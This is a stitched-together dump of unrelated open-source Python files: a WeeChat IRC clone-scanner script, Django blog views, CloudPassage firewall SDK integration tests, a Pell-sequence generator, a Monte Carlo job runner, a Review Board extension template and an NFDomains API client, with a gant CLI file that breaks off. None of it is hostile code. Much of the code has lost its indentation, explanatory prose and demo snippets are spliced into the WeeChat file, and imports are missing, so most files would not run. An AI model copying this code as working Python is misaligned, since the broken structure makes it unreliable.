# * Sebastien "Flashcode" Helleu, for developing the kick-ass chat/IRC
# client WeeChat
# * ArZa, whose kickban.pl script helped me get started with using the
# infolist results.
# * LayBot, for requesting the ident comparison
# * Curtis "killerrabbit" Sorensen, for sending in two pull-requests,
# adding support for local and nameless channels.
#
## TODO:
# - Add option to enable/disable public clone reporting aka msg channels
# - Add option to enable/disable scanning on certain channels/networks
# - Add cross-channel clone scan
# - Add cross-server clone scan
#
## Copyright (c) 2011-2012 Filip H.F. "FiXato" Slagter,
# <FiXato [at] Gmail [dot] com>
# http://google.com/profiles/FiXato
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
SCRIPT_NAME = "clone_scanner"
SCRIPT_AUTHOR = "Filip H.F. 'FiXato' Slagter <fixato [at] gmail [dot] com>"
SCRIPT_VERSION = "1.3"
SCRIPT_LICENSE = "MIT"
SCRIPT_DESC = "A Clone Scanner that can manually scan channels and automatically scans joins for users on the channel with multiple nicknames from the same host."
SCRIPT_COMMAND = "clone_scanner"
SCRIPT_CLOSE_CB = "cs_close_cb"
import_ok = True
try:
import weechat
except ImportError:
print "This script must be run under WeeChat."
import_ok = False
import re
cs_buffer = None
cs_settings = (
("autofocus", "on", "Focus the clone_scanner buffer in the current window if it isn't already displayed by a window."),
("compare_idents", "off", "Match against ident@host.name instead of just the hostname. Useful if you don't want different people from bouncers marked as clones"),
("display_join_messages", "off", "Display all joins in the clone_scanner buffer"),
("display_onjoin_alert_clone_buffer", "on", "Display an on-join clone alert in the clone_scanner buffer"),
("display_onjoin_alert_target_buffer", "on", "Display an on-join clone alert in the buffer where the clone was detected"),
("display_onjoin_alert_current_buffer", "off", "Display an on-join clone alert in the current buffer"),
("display_scan_report_clone_buffer", "on", "Display manual scan reports in the clone buffer"),
("display_scan_report_target_buffer", "off", "Display manual scan reports in the buffer of the scanned channel"),
("display_scan_report_current_buffer", "on", "Display manual scan reports in the current buffer"),
("clone_report_key", "mask", "Which 'key' to display in the clone report: 'mask' for full hostmasks, or 'nick' for nicks"),
("clone_onjoin_alert_key", "mask", "Which 'key' to display in the on-join alerts: 'mask' for full hostmasks, or 'nick' for nicks"),
("colors.onjoin_alert.message", "red", "The on-join clone alert's message colour. Formats are space separated."),
("colors.onjoin_alert.nick", "bold red", "The on-join clone alert's nick colour. Formats are space separated. Note: if you have colorize_nicks, this option might not work as expected."),
("colors.onjoin_alert.channel", "red", "The on-join clone alert's channel colour. Formats are space separated."),
("colors.onjoin_alert.matches", "bold red", "The on-join clone alert's matches (masks or nicks) colour. Formats are space separated. Note: if you have colorize_nicks, this option might not work as expected."),
("colors.join_messages.message", "chat", "The base colour for the join messages."),
("colors.join_messages.nick", "bold", "The colour for the 'nick'-part of the join messages. Note: if you have colorize_nicks, this option might not always work as expected."),
("colors.join_messages.identhost", "chat", "The colour for the 'ident@host'-part of the join messages."),
("colors.join_messages.channel", "bold", "The colour for the 'channel'-part of the join messages."),
("colors.clone_report.header.message", "chat", "The colour of the clone report header."),
("colors.clone_report.header.number_of_hosts", "bold", "The colour of the number of hosts in the clone report header."),
("colors.clone_report.header.channel", "bold", "The colour of the channel name in the clone report header."),
("colors.clone_report.subheader.message", "chat", "The colour of the clone report subheader."),
("colors.clone_report.subheader.host", "bold", "The colour of the host in the clone report subheader."),
("colors.clone_report.subheader.number_of_clones", "bold", "The colour of the number of clones in the clone report subheader."),
("colors.clone_report.clone.message", "chat", "The colour of the clone hit in the clone report message."),
("colors.clone_report.clone.match", "chat", "The colour of the match details (masks or nicks) in the clone report."),
("colors.mask.nick", "bold", "The formatting of the nick in the match mask."),
("colors.mask.identhost", "", "The formatting of the identhost in the match mask."),
)
def get_validated_key_from_config(setting):
key = weechat.config_get_plugin(setting)
if key != 'mask' and key != 'nick':
        weechat.prnt("", "Key %s not found. Valid settings are 'nick' and 'mask'. Reverted the setting to 'mask'" % key)
        weechat.config_set_plugin(setting, "mask")
        key = "mask"
return key
def format_message(msg, formats, reset_color='chat'):
    if isinstance(formats, str):
formats = formats.split()
formatted_message = msg
needs_color_reset = False
for format in formats:
if format in ['bold', 'reverse', 'italic', 'underline']:
end_format = '-%s' % format
else:
needs_color_reset = True
end_format = ""
formatted_message = "%s%s%s" % (weechat.color(format), formatted_message, weechat.color(end_format))
if needs_color_reset:
formatted_message += weechat.color(reset_color)
return formatted_message
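For testing outside WeeChat, the wrapping logic of format_message can be mirrored with weechat.color stubbed out; `format_message_demo` is an illustrative re-implementation (the stub simply wraps colour names in angle brackets so the result can be inspected as plain text):

```python
def format_message_demo(msg, formats, color=lambda name: '<%s>' % name):
    """Same wrapping logic as format_message, with weechat.color() replaced
    by an injectable stub."""
    if isinstance(formats, str):
        formats = formats.split()
    formatted = msg
    needs_color_reset = False
    for fmt in formats:
        if fmt in ('bold', 'reverse', 'italic', 'underline'):
            end_format = '-%s' % fmt
        else:
            needs_color_reset = True
            end_format = ''
        formatted = '%s%s%s' % (color(fmt), formatted, color(end_format))
    if needs_color_reset:
        formatted += color('chat')
    return formatted

print(format_message_demo('clone!', 'bold red'))
```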
def format_from_config(msg, config_option):
return format_message(msg, weechat.config_get_plugin(config_option))
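The JOIN-line regex used in on_join_scan_cb can be exercised outside WeeChat; `parse_join` below is a standalone illustration (the sample hostmask matches the examples in the header comments):

```python
import re

JOIN_PATTERN = r':[^!]+!([^@]+@(\S+)) JOIN :?([#&]\S*)'

def parse_join(signal_data):
    """Return (ident@host, host, channel) for an IRC JOIN line, or None.
    The channel group accepts local (&) and nameless (# or &) channels."""
    m = re.match(JOIN_PATTERN, signal_data)
    if not m:
        return None
    return m.group(1).lower(), m.group(2).lower(), m.group(3)

print(parse_join(':FiXato_Odie!FiXato@FiXato.Net JOIN :#lounge'))
```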
def on_join_scan_cb(data, signal, signal_data):
network = signal.split(',')[0]
joined_nick = weechat.info_get("irc_nick_from_host", signal_data)
    join_match_data = re.match(r':[^!]+!([^@]+@(\S+)) JOIN :?([#&]\S*)', signal_data)
parsed_ident_host = join_match_data.group(1).lower()
parsed_host = join_match_data.group(2).lower()
if weechat.config_get_plugin("compare_idents") == "on":
hostkey = parsed_ident_host
else:
hostkey = parsed_host
chan_name = join_match_data.group(3)
network_chan_name = "%s.%s" % (network, chan_name)
chan_buffer = weechat.info_get("irc_buffer", "%s,%s" % (network, chan_name))
if not chan_buffer:
print "No IRC channel buffer found for %s" % network_chan_name
return weechat.WEECHAT_RC_OK
if weechat.config_get_plugin("display_join_messages") == "on":
message = "%s%s%s%s%s" % (
format_from_config(joined_nick, "colors.join_messages.nick"),
format_from_config("!", "colors.join_messages.message"),
format_from_config(parsed_ident_host, "colors.join_messages.identhost"),
format_from_config(" JOINed ", "colors.join_messages.message"),
format_from_config(network_chan_name, "colors.join_messages.channel"),
)
#Make sure message format is also applied if no formatting is given for nick
message = format_from_config(message, "colors.join_messages.message")
weechat.prnt(cs_get_buffer(), message)
clones = get_clones_for_buffer("%s,%s" % (network, chan_name), hostkey)
if clones:
key = get_validated_key_from_config("clone_onjoin_alert_key")
filtered_clones = filter(lambda clone: clone['nick'] != joined_nick, clones[hostkey])
match_strings = map(lambda m: format_from_config(m[key], "colors.onjoin_alert.matches"), filtered_clones)
join_string = format_from_config(' and ',"colors.onjoin_alert.message")
masks = join_string.join(match_strings)
message = "%s %s %s %s %s" % (
format_from_config(joined_nick, "colors.onjoin_alert.nick"),
format_from_config("is already on", "colors.onjoin_alert.message"),
format_from_config(network_chan_name, "colors.onjoin_alert.channel"),
format_from_config("as", "colors.onjoin_alert.message"),
masks
)
message = format_from_config(message, weechat.config_get_plugin("colors.onjoin_alert.message"))
if weechat.config_get_plugin("display_onjoin_alert_clone_buffer") == "on":
weechat.prnt(cs_get_buffer(),message)
if weechat.config_get_plugin("display_onjoin_alert_target_buffer") == "on":
weechat.prnt(chan_buffer, message)
if weechat.config_get_plugin("display_onjoin_alert_current_buffer") == "on":
weechat.prnt(weechat.current_buffer(),message)
return weechat.WEECHAT_RC_OK


def cs_get_buffer():
    global cs_buffer

    if not cs_buffer:
        # Sets notify to 0 as this buffer does not need to be in hotlist.
        cs_buffer = weechat.buffer_new("clone_scanner", "",
                                       "", SCRIPT_CLOSE_CB, "")
        weechat.buffer_set(cs_buffer, "title", "Clone Scanner")
        weechat.buffer_set(cs_buffer, "notify", "0")
        weechat.buffer_set(cs_buffer, "nicklist", "0")
    if weechat.config_get_plugin("autofocus") == "on":
        if not weechat.window_search_with_buffer(cs_buffer):
            weechat.command("", "/buffer " +
                            weechat.buffer_get_string(cs_buffer, "name"))
    return cs_buffer


def cs_close_cb(*args):
    """A callback for buffer closing."""
    global cs_buffer

    # TODO: Ensure the clone_scanner buffer gets closed if its option is set
    # and the script unloads
    cs_buffer = None
    return weechat.WEECHAT_RC_OK


def get_channel_from_buffer_args(buffer, args):
    server_name = weechat.buffer_get_string(buffer, "localvar_server")
    channel_name = args
    if not channel_name:
        channel_name = weechat.buffer_get_string(buffer, "localvar_channel")

    match_data = re.match(r'\A(irc.)?([^.]+)\.([#&]\S*)\Z', channel_name)
    if match_data:
        channel_name = match_data.group(3)
        server_name = match_data.group(2)
    return server_name, channel_name


def get_clones_for_buffer(infolist_buffer_name, hostname_to_match=None):
    matches = {}
    infolist = weechat.infolist_get("irc_nick", "", infolist_buffer_name)
    while weechat.infolist_next(infolist):
        ident_hostname = weechat.infolist_string(infolist, "host")
        host_matchdata = re.match(r'([^@]+)@(\S+)', ident_hostname)
        if not host_matchdata:
            continue

        hostname = host_matchdata.group(2).lower()
        ident = host_matchdata.group(1).lower()
        if weechat.config_get_plugin("compare_idents") == "on":
            hostkey = ident_hostname.lower()
        else:
            hostkey = hostname

        if hostname_to_match and hostname_to_match.lower() != hostkey:
            continue

        nick = weechat.infolist_string(infolist, "name")
        matches.setdefault(hostkey, []).append({
            'nick': nick,
            'mask': "%s!%s" % (
                format_from_config(nick, "colors.mask.nick"),
                format_from_config(ident_hostname, "colors.mask.identhost")),
            'ident': ident,
            'ident_hostname': ident_hostname,
            'hostname': hostname,
        })
    weechat.infolist_free(infolist)

    # Select only the results that have more than 1 match for a host
    return {k: v for k, v in matches.items() if len(v) > 1}


def report_clones(clones, scanned_buffer_name, target_buffer=None):
    # Default to the clone_scanner buffer
    if not target_buffer:
        target_buffer = cs_get_buffer()

    if clones:
        clone_report_header = "%s %s %s%s" % (
            format_from_config(len(clones),
                               "colors.clone_report.header.number_of_hosts"),
            format_from_config("hosts with clones were found on",
                               "colors.clone_report.header.message"),
            format_from_config(scanned_buffer_name,
                               "colors.clone_report.header.channel"),
            format_from_config(":", "colors.clone_report.header.message"),
        )
        clone_report_header = format_from_config(
            clone_report_header, "colors.clone_report.header.message")
        weechat.prnt(target_buffer, clone_report_header)

        key = get_validated_key_from_config("clone_report_key")
        # Use a distinct name for the per-host list to avoid shadowing the
        # clones dict itself.
        for host, host_clones in clones.items():
            host_message = "%s %s %s %s" % (
                format_from_config(host,
                                   "colors.clone_report.subheader.host"),
                format_from_config("is online from",
                                   "colors.clone_report.subheader.message"),
                format_from_config(len(host_clones),
                                   "colors.clone_report.subheader.number_of_clones"),
                format_from_config("nicks:",
                                   "colors.clone_report.subheader.message"),
            )
            host_message = format_from_config(
                host_message, "colors.clone_report.subheader.message")
            weechat.prnt(target_buffer, host_message)
            for user in host_clones:
                clone_message = "%s%s" % (
                    " - ",
                    format_from_config(user[key],
                                       "colors.clone_report.clone.match"))
                clone_message = format_from_config(
                    clone_message, "colors.clone_report.clone.message")
                weechat.prnt(target_buffer, clone_message)
    else:
        weechat.prnt(target_buffer,
                     "No clones found on %s" % scanned_buffer_name)


def cs_command_main(data, buffer, args):
    if args[0:4] == 'scan':
        server_name, channel_name = get_channel_from_buffer_args(buffer,
                                                                 args[5:])
        clones = get_clones_for_buffer('%s,%s' % (server_name, channel_name))
        if weechat.config_get_plugin("display_scan_report_target_buffer") == "on":
            target_buffer = weechat.info_get(
                "irc_buffer", "%s,%s" % (server_name, channel_name))
            report_clones(clones, '%s.%s' % (server_name, channel_name),
                          target_buffer)
        if weechat.config_get_plugin("display_scan_report_clone_buffer") == "on":
            report_clones(clones, '%s.%s' % (server_name, channel_name))
        if weechat.config_get_plugin("display_scan_report_current_buffer") == "on":
            report_clones(clones, '%s.%s' % (server_name, channel_name),
                          weechat.current_buffer())
    elif args[0:9] == 'advertise':
        weechat.command("", "/input insert /me is using FiXato's CloneScanner "
                        "v%s for WeeChat. Get the latest version from: "
                        "https://github.com/FiXato/weechat_scripts/blob/master/clone_scanner.py"
                        % SCRIPT_VERSION)
    return weechat.WEECHAT_RC_OK


def cs_set_default_settings():
    global cs_settings

    # Descriptions for plugin options are supported from WeeChat 0.3.5 on.
    version = weechat.info_get("version_number", "") or 0
    # Set default settings
    for option, default_value, description in cs_settings:
        if not weechat.config_is_set_plugin(option):
            weechat.config_set_plugin(option, default_value)
        if int(version) >= 0x00030500:
            weechat.config_set_desc_plugin(option, description)


if __name__ == "__main__" and import_ok:
    if weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,
                        SCRIPT_LICENSE, SCRIPT_DESC, SCRIPT_CLOSE_CB, ""):
        cs_set_default_settings()
        cs_buffer = weechat.buffer_search("python", "clone_scanner")
        weechat.hook_signal("*,irc_in2_join", "on_join_scan_cb", "")
        weechat.hook_command(
            SCRIPT_COMMAND,
            SCRIPT_DESC,
            "[scan] [[plugin.][network.]channel] | [advertise] | [help]",
            "the target_buffer can be:\n"
            "- left out, so the current channel buffer will be scanned.\n"
            "- a plain channel name, such as #weechat, in which case it will "
            "be prefixed with the current network name\n"
            "- a channel name prefixed with the network name, such as "
            "Freenode.#weechat\n"
            "- a channel name prefixed with plugin and network name, such as "
            "irc.freenode.#weechat\n"
            "See /set plugins.var.python.clone_scanner.* for all possible "
            "configuration options",
            " || scan %(buffers_names)"
            " || advertise"
            " || help",
            "cs_command_main", "")


# ===========================================================================
# blog/views.py (from KoukiNAGATA/kouchan-blog, MIT)
# ===========================================================================
from blog.models import Post
class CommonListView(ListView):
"""ListViewのテンプレート"""
model = Post
template_name = "post_list.html"
paginate_by = 10
def get_context_data(self, **kw):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kw)
context['posts_all'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
return context
class PostListView(CommonListView):
def get_context_data(self, **kw):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
context['title'] = "TOP"
return context
class BlogListView(CommonListView):
def get_context_data(self, **kw):
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').filter(category__name='Blog')
context['title'] = "Blog"
return context
class NewsListView(CommonListView):
def get_context_data(self, **kw):
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').filter(category__name='News')
context['title'] = "News"
return context
class PostDetailView(DetailView):
model = Post
pk_url_kwarg = "post_id"
template_name = "post_detail.html"
# postはこちらで持っておく
context_object_name = "post"
def get_context_data(self, **kwargs):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kwargs)
context['posts_all'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
return context
class AboutView(CommonListView):
model = Post
template_name = "about.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = "About"
return context


# ===========================================================================
# tests/integration/test_integration_firewall_policy.py
# (from cloudpassage-halo-python-sdk, BSD-3-Clause)
# ===========================================================================
import json
import os
policy_file_name = "firewall.json"
config_file_name = "portal.yaml.local"
tests_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))
config_file = os.path.join(tests_dir, "configs/", config_file_name)
policy_file = os.path.join(tests_dir, 'policies/', policy_file_name)
session_info = cloudpassage.ApiKeyManager(config_file=config_file)
key_id = session_info.key_id
secret_key = session_info.secret_key
api_hostname = session_info.api_hostname
api_port = session_info.api_port
with open(policy_file, 'r') as p_file:
firewall_policy_body = p_file.read().replace('\n', '')


def create_firewall_policy_object():
    session = cloudpassage.HaloSession(key_id, secret_key,
                                       api_host=api_hostname,
                                       api_port=api_port,
                                       integration_string="SDK-Smoke")
    firewall_policy_object = cloudpassage.FirewallPolicy(session)
    return firewall_policy_object


def create_firewall_rule_object():
    session = cloudpassage.HaloSession(key_id, secret_key,
                                       api_host=api_hostname,
                                       api_port=api_port,
                                       integration_string="SDK-Smoke")
    firewall_rule_object = cloudpassage.FirewallRule(session)
    return firewall_rule_object


def create_firewall_zone_object():
    session = cloudpassage.HaloSession(key_id, secret_key,
                                       api_host=api_hostname,
                                       api_port=api_port,
                                       integration_string="SDK-Smoke")
    firewall_zone_object = cloudpassage.FirewallZone(session)
    return firewall_zone_object


def create_firewall_service_object():
    session = cloudpassage.HaloSession(key_id, secret_key,
                                       api_host=api_hostname,
                                       api_port=api_port,
                                       integration_string="SDK-Smoke")
    firewall_service_object = cloudpassage.FirewallService(session)
    return firewall_service_object


def create_firewall_interface_object():
    session = cloudpassage.HaloSession(key_id, secret_key,
                                       api_host=api_hostname,
                                       api_port=api_port,
                                       integration_string="SDK-Smoke")
    firewall_interface_object = cloudpassage.FirewallInterface(session)
    return firewall_interface_object


def get_target_linux_firewall_policy():
    firewall_policy = create_firewall_policy_object()
    policy_list = firewall_policy.list_all()
    for policy in policy_list:
        if policy["platform"] == 'linux':
            return policy["id"]
    return None


def remove_policy_by_name(policy_name):
    fw_policy_obj = create_firewall_policy_object()
    policy_list = fw_policy_obj.list_all()
    for policy in policy_list:
        if policy["name"] == policy_name:
            fw_policy_obj.delete(policy["id"])


class TestIntegrationFirewallPolicy:
    def test_instantiation(self):
        session = cloudpassage.HaloSession(key_id, secret_key)
        assert cloudpassage.FirewallPolicy(session)

    def test_firewall_policy_list_all(self):
        """This test requires that a firewall policy exist in your Halo
        account. If you don't have a firewall policy in your Halo account,
        this test will fail.
        """
        firewall_policy = create_firewall_policy_object()
        firewall_policy_list = firewall_policy.list_all()
        assert "id" in firewall_policy_list[0]

    def test_firewall_policy_describe(self):
        """This test requires that a firewall policy exist in your Halo
        account. If you don't have a firewall policy in your Halo account,
        this test will fail.
        """
        firewall_policy = create_firewall_policy_object()
        firewall_policy_list = firewall_policy.list_all()
        target_firewall_policy_id = firewall_policy_list[0]["id"]
        target_policy = firewall_policy.describe(target_firewall_policy_id)
        assert "id" in target_policy

    def test_firewall_policy_create_update_delete(self):
        firewall_policy = create_firewall_policy_object()
        remove_policy_by_name("cpapi_test_1")
        remove_policy_by_name("NewName")
        this_policy = json.loads(firewall_policy_body)
        this_policy["firewall_policy"]["name"] = "cpapi_test_1"
        new_policy_id = firewall_policy.create(json.dumps(this_policy))
        policy_update = {"firewall_policy": {"name": "NewName",
                                             "id": new_policy_id}}
        firewall_policy.update(policy_update)
        delete_error = firewall_policy.delete(new_policy_id)
        assert delete_error is None


class TestIntegrationFirewallRule:
    def test_instantiation(self):
        session = cloudpassage.HaloSession(key_id, secret_key)
        assert cloudpassage.FirewallRule(session)

    def test_list_firewall_policy_rules(self):
        firewall_rule = create_firewall_rule_object()
        target_firewall_policy_id = get_target_linux_firewall_policy()
        policy_rules = firewall_rule.list_all(target_firewall_policy_id)
        assert "id" in policy_rules[0]

    def test_get_firewall_policy_rule_describe(self):
        firewall_rule = create_firewall_rule_object()
        target_firewall_policy_id = get_target_linux_firewall_policy()
        policy_rules = firewall_rule.list_all(target_firewall_policy_id)
        target_rule_id = policy_rules[0]["id"]
        rule_details = firewall_rule.describe(target_firewall_policy_id,
                                              target_rule_id)
        assert "id" in rule_details

    def test_firewall_policy_rule_create_mod_delete(self):
        modification_body = {"firewall_rule": {
            "comment": "Your momma makes firewall rules"}}
        firewall_policy = create_firewall_policy_object()
        remove_policy_by_name("cpapi_test_2")
        firewall_rule = create_firewall_rule_object()
        this_policy = json.loads(firewall_policy_body)
        this_policy["firewall_policy"]["name"] = "cpapi_test_2"
        target_policy_id = firewall_policy.create(json.dumps(this_policy))
        rule_imported = firewall_rule.list_all(target_policy_id)[0]
        del rule_imported["url"]
        rule_imported["position"] = 1
        rule_body = {"firewall_rule": rule_imported}
        print(rule_body)
        target_rule_id = firewall_rule.create(target_policy_id, rule_body)
        modification_error = firewall_rule.update(target_policy_id,
                                                  target_rule_id,
                                                  modification_body)
        delete_rule_error = firewall_rule.delete(target_policy_id,
                                                 target_rule_id)
        delete_policy_error = firewall_policy.delete(target_policy_id)
        assert modification_error is None
        assert delete_rule_error is None
        assert delete_policy_error is None


class TestIntegrationFirewallZone:
    def test_instantiation(self):
        session = cloudpassage.HaloSession(key_id, secret_key)
        assert cloudpassage.FirewallZone(session)

    def test_list_all_ip_zones(self):
        firewall_zone = create_firewall_zone_object()
        list_of_zones = firewall_zone.list_all()
        assert "id" in list_of_zones[0]

    def test_get_zone_details(self):
        firewall_zone = create_firewall_zone_object()
        target_zone_id = firewall_zone.list_all()[0]["id"]
        details = firewall_zone.describe(target_zone_id)
        assert "id" in details

    def test_firewall_zone_create_update_delete(self):
        firewall_zone = create_firewall_zone_object()
        firewall_zone_body = {"firewall_zone": {"name": "CPAPI TEST",
                                                "ip_address": "127.0.0.1"}}
        target_zone_id = firewall_zone.create(firewall_zone_body)
        zone_update = {"firewall_zone": {"name": "NewName",
                                         "id": target_zone_id}}
        firewall_zone.update(zone_update)
        delete_error = firewall_zone.delete(target_zone_id)
        assert delete_error is None


class TestIntegrationFirewallService:
    def test_instantiation(self):
        session = cloudpassage.HaloSession(key_id, secret_key)
        assert cloudpassage.FirewallService(session)

    def test_list_all_services(self):
        firewall_service = create_firewall_service_object()
        list_of_services = firewall_service.list_all()
        assert "id" in list_of_services[0]

    def test_get_service_details(self):
        firewall_service = create_firewall_service_object()
        target_service_id = firewall_service.list_all()[0]["id"]
        details = firewall_service.describe(target_service_id)
        assert "id" in details

    def test_firewall_service_create_update_delete(self):
        firewall_service = create_firewall_service_object()
        firewall_service_body = {"firewall_service": {"name": "CPAPI TEST",
                                                      "protocol": "TCP",
                                                      "port": "1234"}}
        target_service_id = firewall_service.create(firewall_service_body)
        service_update = {"firewall_service": {"name": "NewName",
                                               "id": target_service_id}}
        firewall_service.update(service_update)
        delete_error = firewall_service.delete(target_service_id)
        assert delete_error is None


class TestIntegrationFirewallInterface:
    def test_instantiation(self):
        session = cloudpassage.HaloSession(key_id, secret_key)
        assert cloudpassage.FirewallInterface(session)

    def test_list_all_interfaces(self):
        interface = create_firewall_interface_object()
        list_of_interfaces = interface.list_all()
        assert "id" in list_of_interfaces[0]

    def test_get_interface_details(self):
        interface = create_firewall_interface_object()
        target_interface_id = interface.list_all()[0]["id"]
        details = interface.describe(target_interface_id)
        assert "id" in details

    def test_firewall_interface_create_delete(self):
        interface = create_firewall_interface_object()
        interface_body = {"firewall_interface": {"name": "eth12"}}
        target_interface_id = interface.create(interface_body)
        delete_error = interface.delete(target_interface_id)
        assert delete_error is None


# ===========================================================================
# Pell_Sequence/pell.py (from RayhanHagel/Sequence, MIT)
# ===========================================================================
class Pell:
def __init__(self):
self.limiter = 1000
self.numbers = [0, 1]
self.path = r'./Pell_Sequence/results.txt'
def void(self):
with open(self.path, "w+") as file:
for i in range(self.limiter):
self.numbers.append(2 * self.numbers[i+1] + self.numbers[i])
file.writelines(f'{self.numbers}\n')
Start = Pell()
Start.void()
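As a quick cross-check of the recurrence used in `Pell.void` (each term is twice the previous term plus the one before that, seeded with 0 and 1), the sketch below regenerates the opening terms independently of the results file. The helper name is illustrative and not part of the module above:

```python
def pell_numbers(count):
    """Return the first `count` Pell numbers via P(n) = 2*P(n-1) + P(n-2)."""
    numbers = [0, 1]
    while len(numbers) < count:
        numbers.append(2 * numbers[-1] + numbers[-2])
    return numbers[:count]

# The sequence opens 0, 1, 2, 5, 12, 29, 70, 169, ...
print(pell_numbers(8))  # -> [0, 1, 2, 5, 12, 29, 70, 169]
```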


# ===========================================================================
# modules/monte_carlo/bin/onramp_run.py (from the onramp project,
# BSD-3-Clause)
# ===========================================================================
#
# Curriculum Module Run Script
# - Run once per run of the module by a user
# - Run inside job submission. So in an allocation.
# - onramp_run_params.cfg file is available in current working directory
#
import os
import sys
from subprocess import call
from configobj import ConfigObj
#
# Read the configobj values
#
# This will always be the name of the file, so fine to hardcode here
conf_file = "onramp_runparams.cfg"
# Already validated the file in our onramp_preprocess.py script - no need to do it again
config = ConfigObj(conf_file)
#
# Run my program
#
os.chdir('src')
# Retrive mode
mode = config['monte_carlo']['mode']
def default_case():
print mode + ' is not a recognized mode.\n'
print '+----------------------------+\n'
print '| mode | program |\n'
print '+----------------------------+\n'
print '| 1s | coin_flip_seq |\n'
print '| 1p | coin_flip_omp |\n'
print '| 2s | draw_four_suits_seq |\n'
print '| 2p | draw_four_suits_omp |\n'
print '| 3s | roulette_sim_seq |\n'
print '| 3p | roulette_sim_omp |\n'
print '+----------------------------+\n'
sys.exit(-1)
def coin_seq():
call(['mpirun', '-np', '1', 'coin_flip_seq'])
def coin_omp():
call(['mpirun', '-np', '1', 'coin_flip_omp', config['monte_carlo']['threads']])
def draw_seq():
call(['mpirun', '-np', '1', 'draw_four_suits_seq'])
def draw_omp():
call(['mpirun', '-np', '1', 'draw_four_suits_omp', config['monte_carlo']['threads']])
def roulette_seq():
call(['mpirun', '-np', '1', 'roulette_sim_seq'])
def roulette_omp():
call(['mpirun', '-np', '1', 'roulette_sim_omp', config['monte_carlo']['threads']])
def pi_seq():
call(['mpirun', '-np', '1', 'pi_seq', config['monte_carlo']['pi_trials']])
def pi_omp():
call(['mpirun', '-np', '1', 'pi_omp', config['monte_carlo']['pi_trials'], config['monte_carlo']['threads']])
executables = { '1s' : coin_seq, '1p' : coin_omp, '2s' : draw_seq, '2p' : draw_omp, '3s' : roulette_seq, '3p' : roulette_omp, '4s' : pi_seq, '4p' : pi_omp}
executables.get(mode, default_case)()
# Exit 0 if all is ok
sys.exit(0)


# ===========================================================================
# contrib/tools/templates/extensions/extension/extension.py
# (from Khan/reviewboard, MIT)
# ===========================================================================
from django.conf import settings
from django.conf.urls.defaults import patterns, include
from reviewboard.extensions.base import Extension
{%- if dashboard_link is not none %}
from reviewboard.extensions.hooks import DashboardHook, URLHook
{% endif %}
{%- if dashboard_link is not none %}
class {{class_name}}URLHook(URLHook):
def __init__(self, extension, *args, **kwargs):
pattern = patterns('', (r'^{{package_name}}/',
include('{{package_name}}.urls')))
super({{class_name}}URLHook, self).__init__(extension, pattern)
class {{class_name}}DashboardHook(DashboardHook):
def __init__(self, extension, *args, **kwargs):
entries = [{
'label': '{{dashboard_link}}',
'url': settings.SITE_ROOT + '{{package_name}}/',
}]
super({{class_name}}DashboardHook, self).__init__(extension,
entries=entries, *args, **kwargs)
{%- endif %}
class {{class_name}}(Extension):
{%- if is_configurable %}
is_configurable = True
{%- endif %}
def __init__(self, *args, **kwargs):
super({{class_name}}, self).__init__()
{%- if dashboard_link is not none %}
self.url_hook = {{class_name}}URLHook(self)
self.dashboard_hook = {{class_name}}DashboardHook(self)
{%- endif %}


# ===========================================================================
# src/algo/api_nfdomains.py (from staketaxcsv, MIT)
# ===========================================================================
import requests
from settings_csv import ALGO_NFDOMAINS
# API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
class NFDomainsAPI:
session = requests.Session()
def get_address(self, name):
endpoint = f"nfd/{name}"
params = {"view": "brief"}
data, status_code = self._query(ALGO_NFDOMAINS, endpoint, params)
if status_code == 200:
# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
if "caAlgo" in data:
return data["caAlgo"][0]
else:
return data["owner"]
else:
return None
def _query(self, base_url, endpoint, params=None):
logging.info("Querying NFDomains endpoint %s...", endpoint)
url = f"{base_url}/{endpoint}"
response = self.session.get(url, params=params)
return response.json(), response.status_code
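The fallback rule in `get_address` (prefer the first `caAlgo` deposit address when the record carries one, otherwise resolve to the `owner` field) can be pulled out as a pure function and checked without any network calls. This is a sketch only; the sample records are made up, not real NFD API responses:

```python
def resolve_nfd_record(data):
    """Apply the caAlgo-then-owner resolution rule to a parsed NFD record."""
    if "caAlgo" in data:
        return data["caAlgo"][0]  # primary/deposit address wins
    return data.get("owner")      # otherwise fall back to the owner address

# A record with deposit addresses resolves to the first one...
print(resolve_nfd_record({"caAlgo": ["DEPOSIT1", "DEPOSIT2"],
                          "owner": "OWNER"}))  # -> DEPOSIT1
# ...while a record without them resolves to the owner address.
print(resolve_nfd_record({"owner": "OWNER"}))  # -> OWNER
```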


# ===========================================================================
# gant/main.py (from kshlm/gant, BSD-2-Clause)
# ===========================================================================
from __future__ import unicode_literals, print_function
from .utils.gant_ctx import GantCtx
import os
import click
helpStr = """
Gant : The Gluster helper ant
Creates GlusterFS development and testing environments using Docker
Usage:
